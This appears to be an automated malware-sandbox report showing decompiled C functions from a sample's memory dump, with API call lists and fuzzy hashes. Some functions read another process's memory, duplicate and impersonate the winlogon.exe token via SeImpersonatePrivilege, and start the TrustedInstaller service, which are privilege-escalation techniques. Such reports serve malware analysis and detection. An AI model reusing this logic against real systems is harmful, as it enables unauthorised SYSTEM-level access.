                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 239888749-1740548384
                                                                                                                • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409921(struct HINSTANCE__** __esi) {
                                                                                                                				void* _t6;
                                                                                                                				struct HINSTANCE__* _t7;
                                                                                                                				_Unknown_base(*)()* _t12;
                                                                                                                				CHAR* _t13;
                                                                                                                				intOrPtr* _t17;
                                                                                                                
                                                                                                                				if( *__esi == 0) {
                                                                                                                					_t7 = E00405436(L"psapi.dll"); // executed
                                                                                                                					 *_t17 = "GetModuleBaseNameW";
                                                                                                                					 *__esi = _t7;
                                                                                                                					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                                                					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                                					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                                					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                                					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                                					__esi[3] = _t12;
                                                                                                                					return _t12;
                                                                                                                				}
                                                                                                                				return _t6;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1529661771-70141382
                                                                                                                • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                                                				long _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				int _v20;
                                                                                                                				int _v24;
                                                                                                                				char _v28;
                                                                                                                				void _v538;
                                                                                                                				char _v540;
                                                                                                                				int _v548;
                                                                                                                				char _v564;
                                                                                                                				char _v22292;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t37;
                                                                                                                				int _t43;
                                                                                                                				int _t45;
                                                                                                                				void* _t48;
                                                                                                                				void* _t56;
                                                                                                                				signed int _t57;
                                                                                                                				long _t61;
                                                                                                                				void* _t67;
                                                                                                                				long _t69;
                                                                                                                				void* _t70;
                                                                                                                				void* _t72;
                                                                                                                				void* _t74;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_t67 = __edx;
                                                                                                                				E0040B550(0x5714, __ecx);
                                                                                                                				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                                                				_t82 = _t37;
                                                                                                                				_a16 = _t37;
                                                                                                                				if(_t37 == 0) {
                                                                                                                					_t69 = GetLastError();
                                                                                                                				} else {
                                                                                                                					_t72 =  &_v22292;
                                                                                                                					E0040171F(_t72, _t82);
                                                                                                                					_v8 = 0;
                                                                                                                					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
                                                                                                                					if(_t43 == 0) {
                                                                                                                						_t69 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_t48 = E00405642( &_v564);
                                                                                                                						_t74 = _v548;
                                                                                                                						_t70 = _t48;
                                                                                                                						_a12 = _t74;
                                                                                                                						_v540 = 0;
                                                                                                                						memset( &_v538, 0, 0x1fe);
                                                                                                                						asm("cdq");
                                                                                                                						_push(_t67);
                                                                                                                						_push(_t74);
                                                                                                                						_push(_t70);
                                                                                                                						_push(L"%d  %I64x");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v540);
                                                                                                                						L0040B1EC();
                                                                                                                						_v548 = 0;
                                                                                                                						E004055D1( &_v540,  &_v564);
                                                                                                                						_t16 = _t70 + 0xa; // 0xa
                                                                                                                						_t68 = _t16;
                                                                                                                						_v24 = 0;
                                                                                                                						_v12 = 0;
                                                                                                                						_v20 = 0;
                                                                                                                						_v16 = 0x100;
                                                                                                                						_v28 = 0;
                                                                                                                						E0040559A( &_v28, _t16);
                                                                                                                						_t76 = _v12;
                                                                                                                						_t56 = 0x40c4e8;
                                                                                                                						if(_t76 != 0) {
                                                                                                                							_t56 = _t76;
                                                                                                                						}
                                                                                                                						_t26 = _t70 + 2; // 0x2
                                                                                                                						_t66 = _t70 + _t26;
                                                                                                                						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
                                                                                                                						_t85 = _t76;
                                                                                                                						if(_t76 == 0) {
                                                                                                                							_t76 = 0x40c4e8;
                                                                                                                						}
                                                                                                                						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                                                						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
                                                                                                                						_t69 = _t61;
                                                                                                                						E004055D1(_t61,  &_v28);
                                                                                                                					}
                                                                                                                					_t45 = FindCloseChangeNotification(_a16); // executed
                                                                                                                					E004055D1(_t45,  &_v564);
                                                                                                                				}
                                                                                                                				return _t69;
                                                                                                                			}






























                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                • memset.MSVCRT ref: 00401B4A
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                                                • String ID: %d %I64x
                                                                                                                • API String ID: 1126726007-2565891505
                                                                                                                • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				void _v538;
                                                                                                                				long _v540;
                                                                                                                				void _v1066;
                                                                                                                				char _v1068;
                                                                                                                				long _t30;
                                                                                                                				int _t33;
                                                                                                                				int _t39;
                                                                                                                				void* _t42;
                                                                                                                				void* _t45;
                                                                                                                				long _t49;
                                                                                                                
                                                                                                                				_t45 = __edx;
                                                                                                                				_v540 = 0;
                                                                                                                				memset( &_v538, 0, 0x208);
                                                                                                                				_v1068 = 0;
                                                                                                                				memset( &_v1066, 0, 0x208);
                                                                                                                				E00404C3C( &_v540);
                                                                                                                				_t48 = L"winlogon.exe";
                                                                                                                				_t39 = wcslen(L"winlogon.exe");
                                                                                                                				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                                                				_t53 = _t39 + _t8 - 0x104;
                                                                                                                				_pop(_t42);
                                                                                                                				if(_t39 + _t8 >= 0x104) {
                                                                                                                					_v1068 = 0;
                                                                                                                				} else {
                                                                                                                					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                                                					_pop(_t42);
                                                                                                                				}
                                                                                                                				_v8 = 0;
                                                                                                                				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                                                				_t49 = _t30;
                                                                                                                				_t54 = _t49;
                                                                                                                				if(_t49 == 0) {
                                                                                                                					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                                                					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                                                					if(_t33 == 0) {
                                                                                                                						_t49 = GetLastError();
                                                                                                                					}
                                                                                                                					CloseHandle(_v8);
                                                                                                                				}
                                                                                                                				return _t49;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401F27
                                                                                                                • memset.MSVCRT ref: 00401F3F
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00401F5A
                                                                                                                • wcslen.MSVCRT ref: 00401F69
                                                                                                                • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                • API String ID: 3867304300-2177360481
                                                                                                                • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00401306(void* _a4) {
                                                                                                                				intOrPtr _v28;
                                                                                                                				struct _SERVICE_STATUS _v32;
                                                                                                                				void* _t5;
                                                                                                                				int _t12;
                                                                                                                				void* _t14;
                                                                                                                
                                                                                                                				_t12 = 0; // executed
                                                                                                                				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                                                				_t14 = _t5;
                                                                                                                				if(_t14 != 0) {
                                                                                                                					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                                                                						_t12 = StartServiceW(_t14, 0, 0);
                                                                                                                					}
                                                                                                                					CloseServiceHandle(_t14);
                                                                                                                				}
                                                                                                                				CloseServiceHandle(_a4);
                                                                                                                				return _t12;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                • String ID: TrustedInstaller
                                                                                                                • API String ID: 862991418-565535830
                                                                                                                • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                                				int _t8;
                                                                                                                				struct HINSTANCE__* _t9;
                                                                                                                
                                                                                                                				if( *0x41c8e8 == 0) {
                                                                                                                					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                					if(_t9 != 0) {
                                                                                                                						 *0x41c8e8 = 1;
                                                                                                                						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *0x41c8ec == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                                					return _t8;
                                                                                                                				}
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                				struct HRSRC__* _t12;
                                                                                                                				void* _t16;
                                                                                                                				void* _t17;
                                                                                                                				signed int _t18;
                                                                                                                				signed int _t26;
                                                                                                                				signed int _t29;
                                                                                                                				signed int _t33;
                                                                                                                				struct HRSRC__* _t35;
                                                                                                                				signed int _t36;
                                                                                                                
                                                                                                                				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                                				_t35 = _t12;
                                                                                                                				if(_t35 != 0) {
                                                                                                                					_t33 = SizeofResource(_a4, _t35);
                                                                                                                					if(_t33 > 0) {
                                                                                                                						_t16 = LoadResource(_a4, _t35);
                                                                                                                						if(_t16 != 0) {
                                                                                                                							_t17 = LockResource(_t16);
                                                                                                                							if(_t17 != 0) {
                                                                                                                								_a4 = _t33;
                                                                                                                								_t29 = _t33 * _t33;
                                                                                                                								_t36 = 0;
                                                                                                                								_t7 =  &_a4;
                                                                                                                								 *_t7 = _a4 >> 2;
                                                                                                                								if( *_t7 != 0) {
                                                                                                                									do {
                                                                                                                										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                                										_t36 = _t36 + 1;
                                                                                                                										_t29 = _t26;
                                                                                                                									} while (_t36 < _a4);
                                                                                                                								}
                                                                                                                								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                                                								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                                				void* _t8;
                                                                                                                				void* _t13;
                                                                                                                				signed int _t16;
                                                                                                                				void** _t21;
                                                                                                                				signed int _t22;
                                                                                                                
                                                                                                                				_t21 = __edi;
                                                                                                                				_t22 =  *__eax;
                                                                                                                				if(__edx < _t22) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t13 =  *__edi;
                                                                                                                					do {
                                                                                                                						_t1 =  &_a8; // 0x4057e1
                                                                                                                						 *__eax =  *__eax +  *_t1;
                                                                                                                						_t16 =  *__eax;
                                                                                                                					} while (__edx >= _t16);
                                                                                                                					_t8 = malloc(_t16 * _a4); // executed
                                                                                                                					 *__edi = _t8;
                                                                                                                					if(_t22 > 0) {
                                                                                                                						if(_t8 != 0) {
                                                                                                                							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                                						}
                                                                                                                						free(_t13); // executed
                                                                                                                					}
                                                                                                                					return 0 |  *_t21 != 0x00000000;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • malloc.MSVCRT ref: 0040496D
                                                                                                                • memcpy.MSVCRT ref: 00404985
                                                                                                                • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: freemallocmemcpy
                                                                                                                • String ID: W@
                                                                                                                • API String ID: 3056473165-1729568415
                                                                                                                • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405436(wchar_t* _a4) {
                                                                                                                				void _v2050;
                                                                                                                				signed short _v2052;
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t16;
                                                                                                                				WCHAR* _t18;
                                                                                                                
                                                                                                                				_v2052 = _v2052 & 0x00000000;
                                                                                                                				memset( &_v2050, 0, 0x7fe);
                                                                                                                				E00404C3C( &_v2052);
                                                                                                                				_t18 =  &_v2052;
                                                                                                                				E004047AF(_t18);
                                                                                                                				wcscat(_t18, _a4);
                                                                                                                				_t16 = LoadLibraryW(_t18); // executed
                                                                                                                				if(_t16 == 0) {
                                                                                                                					return LoadLibraryW(_a4);
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                  • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                  • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                • wcscat.MSVCRT ref: 00405478
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3725422290-0
